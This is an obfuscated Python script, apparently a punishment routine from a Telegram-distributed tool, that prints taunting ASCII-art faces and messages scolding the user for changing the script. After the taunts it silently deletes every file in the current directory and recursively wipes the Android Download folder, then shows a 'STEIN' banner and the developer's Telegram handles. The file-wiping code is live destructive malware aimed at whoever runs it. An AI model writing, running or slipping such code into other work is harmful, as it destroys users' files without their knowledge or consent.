D=print
import time as B,os as C,sys as F,pyfiglet as L,shutil as M
from colorama import Fore as A,init
init(autoreset=True)
def E():
	K='.,!?';J='clear';I='cls';D(A.BLUE+'Hey WELCOME TO DARK ZONE');B.sleep(2);N=B.time()
	while B.time()-N<4:D(A.BLUE+'\nâ£¿â£¿â£¿â£¿â£¿â£¿â¡Ÿâ â „â „â „â „â£ â£¤â£´â£¶â£¶â£¶â£¶â£¤â¡€â ˆâ ™â¢¿â£¿â£¿â£¿â£¿â£¿\nâ£¿â£¿â£¿â£¿â£¿â¡Ÿâ „â „â „â „â „â£¸â£¿â£¿â£¿â£¿â£¿â£¿â£¿â£¿â£¿â£†â „â ˆâ£¿â£¿â£¿â£¿â£¿\nâ£¿â£¿â£¿â£¿â£¿â â „â „â „â¢€â£´â£¿â£¿â£¿â£¿â£¿â£¿â£¿â£¿â£¿â£¿â£¿â „â „â¢ºâ£¿â£¿â£¿â£¿\nâ£¿â£¿â£¿â£¿â£¿â¡„â „â „â „â ™â »â ¿â£¿â£¿â£¿â£¿â ¿â ¿â ›â ›â »â£¿â¡„â „â£¾â£¿â£¿â£¿â£¿\nâ£¿â£¿â£¿â£¿â£¿â¡‡â „â „â  ðŸ‘ï¸ â „â¢¹â£¿â¡—â „ ðŸ‘ï¸ â¢„â¡€â£¾â¢€â£¿â£¿â£¿â£¿â£¿â£¿\nâ£¿â£¿â£¿â£¿â£¿â¡‡â ˜â „â „â „â¢€â¡€â „â£¿â£¿â£·â£¤â£¤â£¾â£¿â£¿â£¿â£§â¢¸â£¿â£¿â£¿â£¿â£¿\nâ£¿â£¿â£¿â£¿â£¿â¡‡â „â£°â£¿â¡¿â Ÿâ ƒâ „â£¿â£¿â£¿â£¿â£¿â¡›â ¿â¢¿â£¿â£·â£¾â£¿â£¿â£¿â£¿â£¿\nâ£¿â£¿â£¿â£¿â£¿â£¿â¡„â ˆâ â „â „â „â „â »â ¿â¢›â£¿â£¿â ¿â ‚â „â¢¹â¢¹â£¿â£¿â£¿â£¿â£¿â£¿\nâ£¿â£¿â£¿â£¿â£¿â£¿â£¿â¡â â „â „â£ â£€â£€â£šâ£¯â£µâ£¶â †â£°â „â žâ£¾â£¿â£¿â£¿â£¿â£¿â£¿\nâ£¿â£¿â£¿â£¿â£¿â£¿â£¿â£·â¡„â „â „â ˆâ ›â ¿â ¿â ¿â£»â¡â¢ â£¿â£Žâ£¾â£¿â£¿â£¿â£¿â£¿â£¿â£¿\nâ£¿â£¿â£¿â£¿â£¿â£¿â¡¿â Ÿâ ›â „â „â „â „â „â ™â£›â£¿â£¿â£µâ£¿â¡¿â¢¹â¡Ÿâ£¿â£¿â£¿â£¿â£¿\nI am sorry brother but you are fucked now\n');B.sleep(.1);C.system(I if C.name=='nt'else J);D(A.GREEN+'\nâ €â €â €â €â €â €â¢ â£¾â£»â£»â£»â£»â Ÿâ ›â ‹â ‰â ‰â ‰â ‰â ›â¢¿â£·â£¦â¡€â €â €â €â €â €\nâ €â €â €â €â €â¢ â£»â£»â£»â£»â£»â ‡â €â €â €â €â €â €â €â €â €â ¹â£»â£·â €â €â €â €â €\nâ €â €â €â €â €â£¾â£»â£»â£»â¡¿â ‹â €â €â €â €â €â €â €â €â €â €â €â£»â£»â¡…â €â €â €â €\nâ €â €â €â €â €â¢»â£»â£»â£»â£¦â£„â£€â €â €â €â €â£€â£€â£¤â£¤â£„â €â¢»â£»â â €â €â €â €\nâ €â €â €â €â €â¢¸â£»â£»â£¾ ðŸ‘ï¸ â£»â¡†â €â¢¨â£» ðŸ‘ï¸ â¡»â¢¿â â¡¿â €â €â €â €â €â €\nâ €â €â €â €â €â¢¸â£§â£»â£»â£»â¡¿â¢¿â£»â €â €â ˆâ ›â ›â â €â €â €â ˜â¡‡â €â €â €â €â €\nâ €â €â €â €â €â¢¸â£»â â €â¢€â£ â£¼â£»â €â €â €â €â €â¢¤â£€â¡€â €â ˆâ â €â €â €â €â €\nâ €â €â €â €â €â €â¢»â£·â£¾â£»â£»â£»â£»â£„â£€â¡¤â €â €â£€â£½â£»â¡†â¡†â €â €â €â €â €â €\nâ €â €â €â €â €â €â €â¢¯â£¯â£»â£»â Ÿâ ¿â ¿â ¥â â Šâ ‰â£¹â â£»â£¡â â €â €â €â €â €â €\nâ €â €â €â €â €â €â €â ˆâ¢»â£»â£»â£·â£¤â£€â£€â£€â „â¢°â¡Ÿâ €â ±â â €â €â €â €â €â €â €\nâ €â €â €â €â €â €â¢€â£ â£¤â£»â£»â£»â£»â£¦â ¤â €â €â Šâ €â¢€â¡†â¢ â €â €â €â €â €\nI am sorry brother but you are fucked now\n');B.sleep(.1);C.system(I if C.name=='nt'else J)
	O="Why you Tried to change the script? You know it don't work when you change things brother.\n\n"
	for E in O:
		if E in K:F.stdout.write(A.YELLOW+E)
		else:F.stdout.write(A.CYAN+E)
		F.stdout.flush();B.sleep(.1)
	D()
	for E in'I hope you understand things now?\n':
		if E in K:F.stdout.write(A.YELLOW+E)
		else:F.stdout.write(A.CYAN+E)
		F.stdout.flush();B.sleep(.1)
	D()
	for G in C.listdir('.'):
		if C.path.isfile(G):C.remove(G)
	H='/storage/emulated/0/Download/'
	if C.path.exists(H):M.rmtree(H)
	P=L.figlet_format('STEIN');D(A.RED+P);D(A.BLUE+'DEVELOPER : @demonpis TELEGRAM');D(A.BLUE+'CHANNEL: @kyixo TELEGRAM');B.sleep(4)
if __name__=='__main__':E()
